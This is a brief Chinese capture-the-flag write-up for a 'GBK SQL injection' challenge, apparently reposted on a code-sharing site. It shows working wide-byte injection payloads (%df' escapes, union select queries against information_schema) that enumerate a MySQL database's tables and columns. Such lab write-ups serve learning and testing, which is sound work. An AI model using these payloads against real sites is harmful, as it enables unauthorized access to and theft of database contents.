南郵CTF--SQL注入題


南郵CTF--SQL注入題

題目:GBK SQL injection

解析:

1.判斷注入點:加入單引號發現被反斜杠轉移掉了,換一個,看清題目,GBK,接下來利用寬字節進行注入

2.使用'%df' '進行注入,emm報錯,於是加入老手段,and 1=1 %23,ok,沒報錯,說明成功

3.繼續改參數,1=2時,沒有任何信息,找到注入點

4.利用order by 查詢列數,當查詢2時,顯示正常,那么查詢3時,顯示錯誤,確定為2列。

5.既然查詢到列,使用聯合查詢,union select 1,2 %23,

6.獲取當前數據庫:union select 1,database() %23

7.獲取當前數據庫名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23

group_concat(table_name) 分組以后,把想要顯示的列通過gruop_concat()函數拼接在一起。

information_schema.TABLES 切說是信息數據庫。其中保存着關於MySQL服務器所維護的所有其他數據庫的信息。如數據庫名,數據庫的表,表欄的數據類型與訪問權限等。

8.獲取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM